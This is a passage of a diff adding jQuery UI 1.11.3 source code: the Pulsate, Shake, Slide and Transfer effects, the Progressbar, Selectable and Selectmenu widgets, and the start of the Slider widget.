+ * jQuery UI Effects Pulsate 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/pulsate-effect/
+ */
+
+
+var effectPulsate = $.effects.effect.pulsate = function( o, done ) {
+	var elem = $( this ),
+		mode = $.effects.setMode( elem, o.mode || "show" ),
+		show = mode === "show",
+		hide = mode === "hide",
+		showhide = ( show || mode === "hide" ),
+
+		// showing or hiding leaves of the "last" animation
+		anims = ( ( o.times || 5 ) * 2 ) + ( showhide ? 1 : 0 ),
+		duration = o.duration / anims,
+		animateTo = 0,
+		queue = elem.queue(),
+		queuelen = queue.length,
+		i;
+
+	if ( show || !elem.is(":visible")) {
+		elem.css( "opacity", 0 ).show();
+		animateTo = 1;
+	}
+
+	// anims - 1 opacity "toggles"
+	for ( i = 1; i < anims; i++ ) {
+		elem.animate({
+			opacity: animateTo
+		}, duration, o.easing );
+		animateTo = 1 - animateTo;
+	}
+
+	elem.animate({
+		opacity: animateTo
+	}, duration, o.easing);
+
+	elem.queue(function() {
+		if ( hide ) {
+			elem.hide();
+		}
+		done();
+	});
+
+	// We just queued up "anims" animations, we need to put them next in the queue
+	if ( queuelen > 1 ) {
+		queue.splice.apply( queue,
+			[ 1, 0 ].concat( queue.splice( queuelen, anims + 1 ) ) );
+	}
+	elem.dequeue();
+};
+
+
+/*!
+ * jQuery UI Effects Shake 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/shake-effect/
+ */
+
+
+var effectShake = $.effects.effect.shake = function( o, done ) {
+
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "height", "width" ],
+		mode = $.effects.setMode( el, o.mode || "effect" ),
+		direction = o.direction || "left",
+		distance = o.distance || 20,
+		times = o.times || 3,
+		anims = times * 2 + 1,
+		speed = Math.round( o.duration / anims ),
+		ref = (direction === "up" || direction === "down") ? "top" : "left",
+		positiveMotion = (direction === "up" || direction === "left"),
+		animation = {},
+		animation1 = {},
+		animation2 = {},
+		i,
+
+		// we will need to re-assemble the queue to stack our animations in place
+		queue = el.queue(),
+		queuelen = queue.length;
+
+	$.effects.save( el, props );
+	el.show();
+	$.effects.createWrapper( el );
+
+	// Animation
+	animation[ ref ] = ( positiveMotion ? "-=" : "+=" ) + distance;
+	animation1[ ref ] = ( positiveMotion ? "+=" : "-=" ) + distance * 2;
+	animation2[ ref ] = ( positiveMotion ? "-=" : "+=" ) + distance * 2;
+
+	// Animate
+	el.animate( animation, speed, o.easing );
+
+	// Shakes
+	for ( i = 1; i < times; i++ ) {
+		el.animate( animation1, speed, o.easing ).animate( animation2, speed, o.easing );
+	}
+	el
+		.animate( animation1, speed, o.easing )
+		.animate( animation, speed / 2, o.easing )
+		.queue(function() {
+			if ( mode === "hide" ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		});
+
+	// inject all the animations we just queued to be first in line (after "inprogress")
+	if ( queuelen > 1) {
+		queue.splice.apply( queue,
+			[ 1, 0 ].concat( queue.splice( queuelen, anims + 1 ) ) );
+	}
+	el.dequeue();
+
+};
+
+
+/*!
+ * jQuery UI Effects Slide 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/slide-effect/
+ */
+
+
+var effectSlide = $.effects.effect.slide = function( o, done ) {
+
+	// Create element
+	var el = $( this ),
+		props = [ "position", "top", "bottom", "left", "right", "width", "height" ],
+		mode = $.effects.setMode( el, o.mode || "show" ),
+		show = mode === "show",
+		direction = o.direction || "left",
+		ref = (direction === "up" || direction === "down") ? "top" : "left",
+		positiveMotion = (direction === "up" || direction === "left"),
+		distance,
+		animation = {};
+
+	// Adjust
+	$.effects.save( el, props );
+	el.show();
+	distance = o.distance || el[ ref === "top" ? "outerHeight" : "outerWidth" ]( true );
+
+	$.effects.createWrapper( el ).css({
+		overflow: "hidden"
+	});
+
+	if ( show ) {
+		el.css( ref, positiveMotion ? (isNaN(distance) ? "-" + distance : -distance) : distance );
+	}
+
+	// Animation
+	animation[ ref ] = ( show ?
+		( positiveMotion ? "+=" : "-=") :
+		( positiveMotion ? "-=" : "+=")) +
+		distance;
+
+	// Animate
+	el.animate( animation, {
+		queue: false,
+		duration: o.duration,
+		easing: o.easing,
+		complete: function() {
+			if ( mode === "hide" ) {
+				el.hide();
+			}
+			$.effects.restore( el, props );
+			$.effects.removeWrapper( el );
+			done();
+		}
+	});
+};
+
+
+/*!
+ * jQuery UI Effects Transfer 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/transfer-effect/
+ */
+
+
+var effectTransfer = $.effects.effect.transfer = function( o, done ) {
+	var elem = $( this ),
+		target = $( o.to ),
+		targetFixed = target.css( "position" ) === "fixed",
+		body = $("body"),
+		fixTop = targetFixed ? body.scrollTop() : 0,
+		fixLeft = targetFixed ? body.scrollLeft() : 0,
+		endPosition = target.offset(),
+		animation = {
+			top: endPosition.top - fixTop,
+			left: endPosition.left - fixLeft,
+			height: target.innerHeight(),
+			width: target.innerWidth()
+		},
+		startPosition = elem.offset(),
+		transfer = $( "<div class='ui-effects-transfer'></div>" )
+			.appendTo( document.body )
+			.addClass( o.className )
+			.css({
+				top: startPosition.top - fixTop,
+				left: startPosition.left - fixLeft,
+				height: elem.innerHeight(),
+				width: elem.innerWidth(),
+				position: targetFixed ? "fixed" : "absolute"
+			})
+			.animate( animation, o.duration, o.easing, function() {
+				transfer.remove();
+				done();
+			});
+};
+
+
+/*!
+ * jQuery UI Progressbar 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/progressbar/
+ */
+
+
+var progressbar = $.widget( "ui.progressbar", {
+	version: "1.11.3",
+	options: {
+		max: 100,
+		value: 0,
+
+		change: null,
+		complete: null
+	},
+
+	min: 0,
+
+	_create: function() {
+		// Constrain initial value
+		this.oldValue = this.options.value = this._constrainedValue();
+
+		this.element
+			.addClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" )
+			.attr({
+				// Only set static values, aria-valuenow and aria-valuemax are
+				// set inside _refreshValue()
+				role: "progressbar",
+				"aria-valuemin": this.min
+			});
+
+		this.valueDiv = $( "<div class='ui-progressbar-value ui-widget-header ui-corner-left'></div>" )
+			.appendTo( this.element );
+
+		this._refreshValue();
+	},
+
+	_destroy: function() {
+		this.element
+			.removeClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-valuemin" )
+			.removeAttr( "aria-valuemax" )
+			.removeAttr( "aria-valuenow" );
+
+		this.valueDiv.remove();
+	},
+
+	value: function( newValue ) {
+		if ( newValue === undefined ) {
+			return this.options.value;
+		}
+
+		this.options.value = this._constrainedValue( newValue );
+		this._refreshValue();
+	},
+
+	_constrainedValue: function( newValue ) {
+		if ( newValue === undefined ) {
+			newValue = this.options.value;
+		}
+
+		this.indeterminate = newValue === false;
+
+		// sanitize value
+		if ( typeof newValue !== "number" ) {
+			newValue = 0;
+		}
+
+		return this.indeterminate ? false :
+			Math.min( this.options.max, Math.max( this.min, newValue ) );
+	},
+
+	_setOptions: function( options ) {
+		// Ensure "value" option is set after other values (like max)
+		var value = options.value;
+		delete options.value;
+
+		this._super( options );
+
+		this.options.value = this._constrainedValue( value );
+		this._refreshValue();
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "max" ) {
+			// Don't allow a max less than min
+			value = Math.max( this.min, value );
+		}
+		if ( key === "disabled" ) {
+			this.element
+				.toggleClass( "ui-state-disabled", !!value )
+				.attr( "aria-disabled", value );
+		}
+		this._super( key, value );
+	},
+
+	_percentage: function() {
+		return this.indeterminate ? 100 : 100 * ( this.options.value - this.min ) / ( this.options.max - this.min );
+	},
+
+	_refreshValue: function() {
+		var value = this.options.value,
+			percentage = this._percentage();
+
+		this.valueDiv
+			.toggle( this.indeterminate || value > this.min )
+			.toggleClass( "ui-corner-right", value === this.options.max )
+			.width( percentage.toFixed(0) + "%" );
+
+		this.element.toggleClass( "ui-progressbar-indeterminate", this.indeterminate );
+
+		if ( this.indeterminate ) {
+			this.element.removeAttr( "aria-valuenow" );
+			if ( !this.overlayDiv ) {
+				this.overlayDiv = $( "<div class='ui-progressbar-overlay'></div>" ).appendTo( this.valueDiv );
+			}
+		} else {
+			this.element.attr({
+				"aria-valuemax": this.options.max,
+				"aria-valuenow": value
+			});
+			if ( this.overlayDiv ) {
+				this.overlayDiv.remove();
+				this.overlayDiv = null;
+			}
+		}
+
+		if ( this.oldValue !== value ) {
+			this.oldValue = value;
+			this._trigger( "change" );
+		}
+		if ( value === this.options.max ) {
+			this._trigger( "complete" );
+		}
+	}
+});
+
+
+/*!
+ * jQuery UI Selectable 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/selectable/
+ */
+
+
+var selectable = $.widget("ui.selectable", $.ui.mouse, {
+	version: "1.11.3",
+	options: {
+		appendTo: "body",
+		autoRefresh: true,
+		distance: 0,
+		filter: "*",
+		tolerance: "touch",
+
+		// callbacks
+		selected: null,
+		selecting: null,
+		start: null,
+		stop: null,
+		unselected: null,
+		unselecting: null
+	},
+	_create: function() {
+		var selectees,
+			that = this;
+
+		this.element.addClass("ui-selectable");
+
+		this.dragged = false;
+
+		// cache selectee children based on filter
+		this.refresh = function() {
+			selectees = $(that.options.filter, that.element[0]);
+			selectees.addClass("ui-selectee");
+			selectees.each(function() {
+				var $this = $(this),
+					pos = $this.offset();
+				$.data(this, "selectable-item", {
+					element: this,
+					$element: $this,
+					left: pos.left,
+					top: pos.top,
+					right: pos.left + $this.outerWidth(),
+					bottom: pos.top + $this.outerHeight(),
+					startselected: false,
+					selected: $this.hasClass("ui-selected"),
+					selecting: $this.hasClass("ui-selecting"),
+					unselecting: $this.hasClass("ui-unselecting")
+				});
+			});
+		};
+		this.refresh();
+
+		this.selectees = selectees.addClass("ui-selectee");
+
+		this._mouseInit();
+
+		this.helper = $("<div class='ui-selectable-helper'></div>");
+	},
+
+	_destroy: function() {
+		this.selectees
+			.removeClass("ui-selectee")
+			.removeData("selectable-item");
+		this.element
+			.removeClass("ui-selectable ui-selectable-disabled");
+		this._mouseDestroy();
+	},
+
+	_mouseStart: function(event) {
+		var that = this,
+			options = this.options;
+
+		this.opos = [ event.pageX, event.pageY ];
+
+		if (this.options.disabled) {
+			return;
+		}
+
+		this.selectees = $(options.filter, this.element[0]);
+
+		this._trigger("start", event);
+
+		$(options.appendTo).append(this.helper);
+		// position helper (lasso)
+		this.helper.css({
+			"left": event.pageX,
+			"top": event.pageY,
+			"width": 0,
+			"height": 0
+		});
+
+		if (options.autoRefresh) {
+			this.refresh();
+		}
+
+		this.selectees.filter(".ui-selected").each(function() {
+			var selectee = $.data(this, "selectable-item");
+			selectee.startselected = true;
+			if (!event.metaKey && !event.ctrlKey) {
+				selectee.$element.removeClass("ui-selected");
+				selectee.selected = false;
+				selectee.$element.addClass("ui-unselecting");
+				selectee.unselecting = true;
+				// selectable UNSELECTING callback
+				that._trigger("unselecting", event, {
+					unselecting: selectee.element
+				});
+			}
+		});
+
+		$(event.target).parents().addBack().each(function() {
+			var doSelect,
+				selectee = $.data(this, "selectable-item");
+			if (selectee) {
+				doSelect = (!event.metaKey && !event.ctrlKey) || !selectee.$element.hasClass("ui-selected");
+				selectee.$element
+					.removeClass(doSelect ? "ui-unselecting" : "ui-selected")
+					.addClass(doSelect ? "ui-selecting" : "ui-unselecting");
+				selectee.unselecting = !doSelect;
+				selectee.selecting = doSelect;
+				selectee.selected = doSelect;
+				// selectable (UN)SELECTING callback
+				if (doSelect) {
+					that._trigger("selecting", event, {
+						selecting: selectee.element
+					});
+				} else {
+					that._trigger("unselecting", event, {
+						unselecting: selectee.element
+					});
+				}
+				return false;
+			}
+		});
+
+	},
+
+	_mouseDrag: function(event) {
+
+		this.dragged = true;
+
+		if (this.options.disabled) {
+			return;
+		}
+
+		var tmp,
+			that = this,
+			options = this.options,
+			x1 = this.opos[0],
+			y1 = this.opos[1],
+			x2 = event.pageX,
+			y2 = event.pageY;
+
+		if (x1 > x2) { tmp = x2; x2 = x1; x1 = tmp; }
+		if (y1 > y2) { tmp = y2; y2 = y1; y1 = tmp; }
+		this.helper.css({ left: x1, top: y1, width: x2 - x1, height: y2 - y1 });
+
+		this.selectees.each(function() {
+			var selectee = $.data(this, "selectable-item"),
+				hit = false;
+
+			//prevent helper from being selected if appendTo: selectable
+			if (!selectee || selectee.element === that.element[0]) {
+				return;
+			}
+
+			if (options.tolerance === "touch") {
+				hit = ( !(selectee.left > x2 || selectee.right < x1 || selectee.top > y2 || selectee.bottom < y1) );
+			} else if (options.tolerance === "fit") {
+				hit = (selectee.left > x1 && selectee.right < x2 && selectee.top > y1 && selectee.bottom < y2);
+			}
+
+			if (hit) {
+				// SELECT
+				if (selectee.selected) {
+					selectee.$element.removeClass("ui-selected");
+					selectee.selected = false;
+				}
+				if (selectee.unselecting) {
+					selectee.$element.removeClass("ui-unselecting");
+					selectee.unselecting = false;
+				}
+				if (!selectee.selecting) {
+					selectee.$element.addClass("ui-selecting");
+					selectee.selecting = true;
+					// selectable SELECTING callback
+					that._trigger("selecting", event, {
+						selecting: selectee.element
+					});
+				}
+			} else {
+				// UNSELECT
+				if (selectee.selecting) {
+					if ((event.metaKey || event.ctrlKey) && selectee.startselected) {
+						selectee.$element.removeClass("ui-selecting");
+						selectee.selecting = false;
+						selectee.$element.addClass("ui-selected");
+						selectee.selected = true;
+					} else {
+						selectee.$element.removeClass("ui-selecting");
+						selectee.selecting = false;
+						if (selectee.startselected) {
+							selectee.$element.addClass("ui-unselecting");
+							selectee.unselecting = true;
+						}
+						// selectable UNSELECTING callback
+						that._trigger("unselecting", event, {
+							unselecting: selectee.element
+						});
+					}
+				}
+				if (selectee.selected) {
+					if (!event.metaKey && !event.ctrlKey && !selectee.startselected) {
+						selectee.$element.removeClass("ui-selected");
+						selectee.selected = false;
+
+						selectee.$element.addClass("ui-unselecting");
+						selectee.unselecting = true;
+						// selectable UNSELECTING callback
+						that._trigger("unselecting", event, {
+							unselecting: selectee.element
+						});
+					}
+				}
+			}
+		});
+
+		return false;
+	},
+
+	_mouseStop: function(event) {
+		var that = this;
+
+		this.dragged = false;
+
+		$(".ui-unselecting", this.element[0]).each(function() {
+			var selectee = $.data(this, "selectable-item");
+			selectee.$element.removeClass("ui-unselecting");
+			selectee.unselecting = false;
+			selectee.startselected = false;
+			that._trigger("unselected", event, {
+				unselected: selectee.element
+			});
+		});
+		$(".ui-selecting", this.element[0]).each(function() {
+			var selectee = $.data(this, "selectable-item");
+			selectee.$element.removeClass("ui-selecting").addClass("ui-selected");
+			selectee.selecting = false;
+			selectee.selected = true;
+			selectee.startselected = true;
+			that._trigger("selected", event, {
+				selected: selectee.element
+			});
+		});
+		this._trigger("stop", event);
+
+		this.helper.remove();
+
+		return false;
+	}
+
+});
+
+
+/*!
+ * jQuery UI Selectmenu 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/selectmenu
+ */
+
+
+var selectmenu = $.widget( "ui.selectmenu", {
+	version: "1.11.3",
+	defaultElement: "<select>",
+	options: {
+		appendTo: null,
+		disabled: null,
+		icons: {
+			button: "ui-icon-triangle-1-s"
+		},
+		position: {
+			my: "left top",
+			at: "left bottom",
+			collision: "none"
+		},
+		width: null,
+
+		// callbacks
+		change: null,
+		close: null,
+		focus: null,
+		open: null,
+		select: null
+	},
+
+	_create: function() {
+		var selectmenuId = this.element.uniqueId().attr( "id" );
+		this.ids = {
+			element: selectmenuId,
+			button: selectmenuId + "-button",
+			menu: selectmenuId + "-menu"
+		};
+
+		this._drawButton();
+		this._drawMenu();
+
+		if ( this.options.disabled ) {
+			this.disable();
+		}
+	},
+
+	_drawButton: function() {
+		var that = this;
+
+		// Associate existing label with the new button
+		this.label = $( "label[for='" + this.ids.element + "']" ).attr( "for", this.ids.button );
+		this._on( this.label, {
+			click: function( event ) {
+				this.button.focus();
+				event.preventDefault();
+			}
+		});
+
+		// Hide original select element
+		this.element.hide();
+
+		// Create button
+		this.button = $( "<span>", {
+			"class": "ui-selectmenu-button ui-widget ui-state-default ui-corner-all",
+			tabindex: this.options.disabled ? -1 : 0,
+			id: this.ids.button,
+			role: "combobox",
+			"aria-expanded": "false",
+			"aria-autocomplete": "list",
+			"aria-owns": this.ids.menu,
+			"aria-haspopup": "true"
+		})
+			.insertAfter( this.element );
+
+		$( "<span>", {
+			"class": "ui-icon " + this.options.icons.button
+		})
+			.prependTo( this.button );
+
+		this.buttonText = $( "<span>", {
+			"class": "ui-selectmenu-text"
+		})
+			.appendTo( this.button );
+
+		this._setText( this.buttonText, this.element.find( "option:selected" ).text() );
+		this._resizeButton();
+
+		this._on( this.button, this._buttonEvents );
+		this.button.one( "focusin", function() {
+
+			// Delay rendering the menu items until the button receives focus.
+			// The menu may have already been rendered via a programmatic open.
+			if ( !that.menuItems ) {
+				that._refreshMenu();
+			}
+		});
+		this._hoverable( this.button );
+		this._focusable( this.button );
+	},
+
+	_drawMenu: function() {
+		var that = this;
+
+		// Create menu
+		this.menu = $( "<ul>", {
+			"aria-hidden": "true",
+			"aria-labelledby": this.ids.button,
+			id: this.ids.menu
+		});
+
+		// Wrap menu
+		this.menuWrap = $( "<div>", {
+			"class": "ui-selectmenu-menu ui-front"
+		})
+			.append( this.menu )
+			.appendTo( this._appendTo() );
+
+		// Initialize menu widget
+		this.menuInstance = this.menu
+			.menu({
+				role: "listbox",
+				select: function( event, ui ) {
+					event.preventDefault();
+
+					// support: IE8
+					// If the item was selected via a click, the text selection
+					// will be destroyed in IE
+					that._setSelection();
+
+					that._select( ui.item.data( "ui-selectmenu-item" ), event );
+				},
+				focus: function( event, ui ) {
+					var item = ui.item.data( "ui-selectmenu-item" );
+
+					// Prevent inital focus from firing and check if its a newly focused item
+					if ( that.focusIndex != null && item.index !== that.focusIndex ) {
+						that._trigger( "focus", event, { item: item } );
+						if ( !that.isOpen ) {
+							that._select( item, event );
+						}
+					}
+					that.focusIndex = item.index;
+
+					that.button.attr( "aria-activedescendant",
+						that.menuItems.eq( item.index ).attr( "id" ) );
+				}
+			})
+			.menu( "instance" );
+
+		// Adjust menu styles to dropdown
+		this.menu
+			.addClass( "ui-corner-bottom" )
+			.removeClass( "ui-corner-all" );
+
+		// Don't close the menu on mouseleave
+		this.menuInstance._off( this.menu, "mouseleave" );
+
+		// Cancel the menu's collapseAll on document click
+		this.menuInstance._closeOnDocumentClick = function() {
+			return false;
+		};
+
+		// Selects often contain empty items, but never contain dividers
+		this.menuInstance._isDivider = function() {
+			return false;
+		};
+	},
+
+	refresh: function() {
+		this._refreshMenu();
+		this._setText( this.buttonText, this._getSelectedItem().text() );
+		if ( !this.options.width ) {
+			this._resizeButton();
+		}
+	},
+
+	_refreshMenu: function() {
+		this.menu.empty();
+
+		var item,
+			options = this.element.find( "option" );
+
+		if ( !options.length ) {
+			return;
+		}
+
+		this._parseOptions( options );
+		this._renderMenu( this.menu, this.items );
+
+		this.menuInstance.refresh();
+		this.menuItems = this.menu.find( "li" ).not( ".ui-selectmenu-optgroup" );
+
+		item = this._getSelectedItem();
+
+		// Update the menu to have the correct item focused
+		this.menuInstance.focus( null, item );
+		this._setAria( item.data( "ui-selectmenu-item" ) );
+
+		// Set disabled state
+		this._setOption( "disabled", this.element.prop( "disabled" ) );
+	},
+
+	open: function( event ) {
+		if ( this.options.disabled ) {
+			return;
+		}
+
+		// If this is the first time the menu is being opened, render the items
+		if ( !this.menuItems ) {
+			this._refreshMenu();
+		} else {
+
+			// Menu clears focus on close, reset focus to selected item
+			this.menu.find( ".ui-state-focus" ).removeClass( "ui-state-focus" );
+			this.menuInstance.focus( null, this._getSelectedItem() );
+		}
+
+		this.isOpen = true;
+		this._toggleAttr();
+		this._resizeMenu();
+		this._position();
+
+		this._on( this.document, this._documentClick );
+
+		this._trigger( "open", event );
+	},
+
+	_position: function() {
+		this.menuWrap.position( $.extend( { of: this.button }, this.options.position ) );
+	},
+
+	close: function( event ) {
+		if ( !this.isOpen ) {
+			return;
+		}
+
+		this.isOpen = false;
+		this._toggleAttr();
+
+		this.range = null;
+		this._off( this.document );
+
+		this._trigger( "close", event );
+	},
+
+	widget: function() {
+		return this.button;
+	},
+
+	menuWidget: function() {
+		return this.menu;
+	},
+
+	_renderMenu: function( ul, items ) {
+		var that = this,
+			currentOptgroup = "";
+
+		$.each( items, function( index, item ) {
+			if ( item.optgroup !== currentOptgroup ) {
+				$( "<li>", {
+					"class": "ui-selectmenu-optgroup ui-menu-divider" +
+						( item.element.parent( "optgroup" ).prop( "disabled" ) ?
+							" ui-state-disabled" :
+							"" ),
+					text: item.optgroup
+				})
+					.appendTo( ul );
+
+				currentOptgroup = item.optgroup;
+			}
+
+			that._renderItemData( ul, item );
+		});
+	},
+
+	_renderItemData: function( ul, item ) {
+		return this._renderItem( ul, item ).data( "ui-selectmenu-item", item );
+	},
+
+	_renderItem: function( ul, item ) {
+		var li = $( "<li>" );
+
+		if ( item.disabled ) {
+			li.addClass( "ui-state-disabled" );
+		}
+		this._setText( li, item.label );
+
+		return li.appendTo( ul );
+	},
+
+	_setText: function( element, value ) {
+		if ( value ) {
+			element.text( value );
+		} else {
+			element.html( "&#160;" );
+		}
+	},
+
+	_move: function( direction, event ) {
+		var item, next,
+			filter = ".ui-menu-item";
+
+		if ( this.isOpen ) {
+			item = this.menuItems.eq( this.focusIndex );
+		} else {
+			item = this.menuItems.eq( this.element[ 0 ].selectedIndex );
+			filter += ":not(.ui-state-disabled)";
+		}
+
+		if ( direction === "first" || direction === "last" ) {
+			next = item[ direction === "first" ? "prevAll" : "nextAll" ]( filter ).eq( -1 );
+		} else {
+			next = item[ direction + "All" ]( filter ).eq( 0 );
+		}
+
+		if ( next.length ) {
+			this.menuInstance.focus( event, next );
+		}
+	},
+
+	_getSelectedItem: function() {
+		return this.menuItems.eq( this.element[ 0 ].selectedIndex );
+	},
+
+	_toggle: function( event ) {
+		this[ this.isOpen ? "close" : "open" ]( event );
+	},
+
+	_setSelection: function() {
+		var selection;
+
+		if ( !this.range ) {
+			return;
+		}
+
+		if ( window.getSelection ) {
+			selection = window.getSelection();
+			selection.removeAllRanges();
+			selection.addRange( this.range );
+
+		// support: IE8
+		} else {
+			this.range.select();
+		}
+
+		// support: IE
+		// Setting the text selection kills the button focus in IE, but
+		// restoring the focus doesn't kill the selection.
+		this.button.focus();
+	},
+
+	_documentClick: {
+		mousedown: function( event ) {
+			if ( !this.isOpen ) {
+				return;
+			}
+
+			if ( !$( event.target ).closest( ".ui-selectmenu-menu, #" + this.ids.button ).length ) {
+				this.close( event );
+			}
+		}
+	},
+
+	_buttonEvents: {
+
+		// Prevent text selection from being reset when interacting with the selectmenu (#10144)
+		mousedown: function() {
+			var selection;
+
+			if ( window.getSelection ) {
+				selection = window.getSelection();
+				if ( selection.rangeCount ) {
+					this.range = selection.getRangeAt( 0 );
+				}
+
+			// support: IE8
+			} else {
+				this.range = document.selection.createRange();
+			}
+		},
+
+		click: function( event ) {
+			this._setSelection();
+			this._toggle( event );
+		},
+
+		keydown: function( event ) {
+			var preventDefault = true;
+			switch ( event.keyCode ) {
+				case $.ui.keyCode.TAB:
+				case $.ui.keyCode.ESCAPE:
+					this.close( event );
+					preventDefault = false;
+					break;
+				case $.ui.keyCode.ENTER:
+					if ( this.isOpen ) {
+						this._selectFocusedItem( event );
+					}
+					break;
+				case $.ui.keyCode.UP:
+					if ( event.altKey ) {
+						this._toggle( event );
+					} else {
+						this._move( "prev", event );
+					}
+					break;
+				case $.ui.keyCode.DOWN:
+					if ( event.altKey ) {
+						this._toggle( event );
+					} else {
+						this._move( "next", event );
+					}
+					break;
+				case $.ui.keyCode.SPACE:
+					if ( this.isOpen ) {
+						this._selectFocusedItem( event );
+					} else {
+						this._toggle( event );
+					}
+					break;
+				case $.ui.keyCode.LEFT:
+					this._move( "prev", event );
+					break;
+				case $.ui.keyCode.RIGHT:
+					this._move( "next", event );
+					break;
+				case $.ui.keyCode.HOME:
+				case $.ui.keyCode.PAGE_UP:
+					this._move( "first", event );
+					break;
+				case $.ui.keyCode.END:
+				case $.ui.keyCode.PAGE_DOWN:
+					this._move( "last", event );
+					break;
+				default:
+					this.menu.trigger( event );
+					preventDefault = false;
+			}
+
+			if ( preventDefault ) {
+				event.preventDefault();
+			}
+		}
+	},
+
+	_selectFocusedItem: function( event ) {
+		var item = this.menuItems.eq( this.focusIndex );
+		if ( !item.hasClass( "ui-state-disabled" ) ) {
+			this._select( item.data( "ui-selectmenu-item" ), event );
+		}
+	},
+
+	_select: function( item, event ) {
+		var oldIndex = this.element[ 0 ].selectedIndex;
+
+		// Change native select element
+		this.element[ 0 ].selectedIndex = item.index;
+		this._setText( this.buttonText, item.label );
+		this._setAria( item );
+		this._trigger( "select", event, { item: item } );
+
+		if ( item.index !== oldIndex ) {
+			this._trigger( "change", event, { item: item } );
+		}
+
+		this.close( event );
+	},
+
+	_setAria: function( item ) {
+		var id = this.menuItems.eq( item.index ).attr( "id" );
+
+		this.button.attr({
+			"aria-labelledby": id,
+			"aria-activedescendant": id
+		});
+		this.menu.attr( "aria-activedescendant", id );
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "icons" ) {
+			this.button.find( "span.ui-icon" )
+				.removeClass( this.options.icons.button )
+				.addClass( value.button );
+		}
+
+		this._super( key, value );
+
+		if ( key === "appendTo" ) {
+			this.menuWrap.appendTo( this._appendTo() );
+		}
+
+		if ( key === "disabled" ) {
+			this.menuInstance.option( "disabled", value );
+			this.button
+				.toggleClass( "ui-state-disabled", value )
+				.attr( "aria-disabled", value );
+
+			this.element.prop( "disabled", value );
+			if ( value ) {
+				this.button.attr( "tabindex", -1 );
+				this.close();
+			} else {
+				this.button.attr( "tabindex", 0 );
+			}
+		}
+
+		if ( key === "width" ) {
+			this._resizeButton();
+		}
+	},
+
+	_appendTo: function() {
+		var element = this.options.appendTo;
+
+		if ( element ) {
+			element = element.jquery || element.nodeType ?
+				$( element ) :
+				this.document.find( element ).eq( 0 );
+		}
+
+		if ( !element || !element[ 0 ] ) {
+			element = this.element.closest( ".ui-front" );
+		}
+
+		if ( !element.length ) {
+			element = this.document[ 0 ].body;
+		}
+
+		return element;
+	},
+
+	_toggleAttr: function() {
+		this.button
+			.toggleClass( "ui-corner-top", this.isOpen )
+			.toggleClass( "ui-corner-all", !this.isOpen )
+			.attr( "aria-expanded", this.isOpen );
+		this.menuWrap.toggleClass( "ui-selectmenu-open", this.isOpen );
+		this.menu.attr( "aria-hidden", !this.isOpen );
+	},
+
+	_resizeButton: function() {
+		var width = this.options.width;
+
+		if ( !width ) {
+			width = this.element.show().outerWidth();
+			this.element.hide();
+		}
+
+		this.button.outerWidth( width );
+	},
+
+	_resizeMenu: function() {
+		this.menu.outerWidth( Math.max(
+			this.button.outerWidth(),
+
+			// support: IE10
+			// IE10 wraps long text (possibly a rounding bug)
+			// so we add 1px to avoid the wrapping
+			this.menu.width( "" ).outerWidth() + 1
+		) );
+	},
+
+	_getCreateOptions: function() {
+		return { disabled: this.element.prop( "disabled" ) };
+	},
+
+	_parseOptions: function( options ) {
+		var data = [];
+		options.each(function( index, item ) {
+			var option = $( item ),
+				optgroup = option.parent( "optgroup" );
+			data.push({
+				element: option,
+				index: index,
+				value: option.val(),
+				label: option.text(),
+				optgroup: optgroup.attr( "label" ) || "",
+				disabled: optgroup.prop( "disabled" ) || option.prop( "disabled" )
+			});
+		});
+		this.items = data;
+	},
+
+	_destroy: function() {
+		this.menuWrap.remove();
+		this.button.remove();
+		this.element.show();
+		this.element.removeUniqueId();
+		this.label.attr( "for", this.ids.element );
+	}
+});
+
+
+/*!
+ * jQuery UI Slider 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/slider/
+ */
+
+
+var slider = $.widget( "ui.slider", $.ui.mouse, {
+	version: "1.11.3",
+	widgetEventPrefix: "slide",
+
+	options: {
+		animate: false,
+		distance: 0,
+		max: 100,
+		min: 0,
+		orientation: "horizontal",
+		range: false,
+		step: 1,
+		value: 0,
+		values: null,
+
+		// callbacks
+		change: null,
+		slide: null,
+		start: null,
+		stop: null
+	},
+
+	// number of pages in a slider
+	// (how many times can you page up/down to go through the whole range)
+	numPages: 5,
+
+	_create: function() {
+		this._keySliding = false;
+		this._mouseSliding = false;
+		this._animateOff = true;
+		this._handleIndex = null;
+		this._detectOrientation();
+		this._mouseInit();
+		this._calculateNewMax();
+
+		this.element
+			.addClass( "ui-slider" +
+				" ui-slider-" + this.orientation +
+				" ui-widget" +
+				" ui-widget-content" +
+				" ui-corner-all");
+
+		this._refresh();
+		this._setOption( "disabled", this.options.disabled );
+
+		this._animateOff = false;
+	},
+
+	_refresh: function() {
+		this._createRange();
+		this._createHandles();
+		this._setupEvents();
+		this._refreshValue();
+	},
+
+	_createHandles: function() {
+		var i, handleCount,
+			options = this.options,
